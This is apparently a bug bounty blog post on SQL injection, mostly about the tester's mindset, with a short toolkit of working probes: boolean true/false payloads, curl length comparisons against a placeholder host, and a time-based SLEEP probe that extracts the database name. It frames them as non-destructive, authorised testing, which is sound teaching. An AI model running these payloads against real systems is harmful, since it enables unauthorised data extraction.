SQL Injection — Practical Bug Bounty Guide

Non-destructive detection, triage templates, and safe PoCs for hunters
Written by 4cid.burn · October 23, 2025 · The Undergrid

Every hunter starts here

Before API fuzzers, before massive recon, before you automate half the internet — there’s SQL Injection.

It’s not nostalgia. It’s anatomy. If you don't understand how SQLi really works, you don't understand how the web breathes. The single quote that changes a query is the smallest, most honest probe of a system's trust. It reveals where data becomes logic.

Modern hunters who lean only on tools miss what the quiet ones see: why an ORM call becomes unsafe when string concatenation survives a refactor, or why a mobile API that 'looks safe' exposes the same vulnerabilities as a legacy admin page. Understand the substrate and you stop chasing symptoms.

SQLi evolved — it's not the same old bug

The low-hanging fruit has been picked. What remains are the corner cases: JSON keys injected into raw queries, query builders abused by dynamic filters, secondary endpoints inside microservices that escaped code review. Expertise is pattern recognition: seeing the developer's assumptions and breaking them.

When you think like the database — what it expects, what it tolerates, how it formats errors — you craft PoCs that are quiet, precise, and triage-friendly.

The ground truth

The database never lies. Every input that reaches it carries the fingerprint of the developer’s trust. SQLi teaches you to read that trust backwards — to see how the app's faith in input becomes its undoing. Once you see it, you test assumptions, not just inputs.

A Hunter’s Toolkit — Non-destructive Proofs

Baseline 
GET /product?id=10
True Condition 
GET /product?id=10' AND 1=1--
False Condition 
GET /product?id=10' AND 1=2--
Curl Validation (length-based) 
curl -s "https://target.example.com/product?id=10" -o /tmp/base && wc -c /tmp/base
curl -s "https://target.example.com/product?id=10' AND 1=1--" -o /tmp/t && wc -c /tmp/t
curl -s "https://target.example.com/product?id=10' AND 1=2--" -o /tmp/f && wc -c /tmp/f
Time-based Probe (use sparingly) 
GET /item?id=5' AND IF(SUBSTRING((SELECT database()),1,1)='a', SLEEP(2), 0)--

Why this matters for a bug bounty hunter

Because every injection teaches you about trust boundaries. Knowing SQLi isn't just about getting a PoC — it's about pivoting: from a web parameter to a mobile API to a microservice, all with the same mental model. It shifts you from a scanner operator to a solver.

In reports, triagers respond to clarity and minimalism. A good PoC shows how the DB behaved differently — not a data dump of everything you guessed. That discipline increases signal, reduces noise, and gets bounties paid faster.

Field advice — hunting with restraint

Start manual. Confirm boolean differences and length/timing locally before automating. When you reach for automated tools, keep level and risk low. If you need to enumerate sensitive tables, ask triage for permission — aggressive enumeration often kills programs and your reputation.

Protect the asset as you test it. Responsible testing is a mark of professionalism, and professionalism pays in the long run — both reputationally and financially.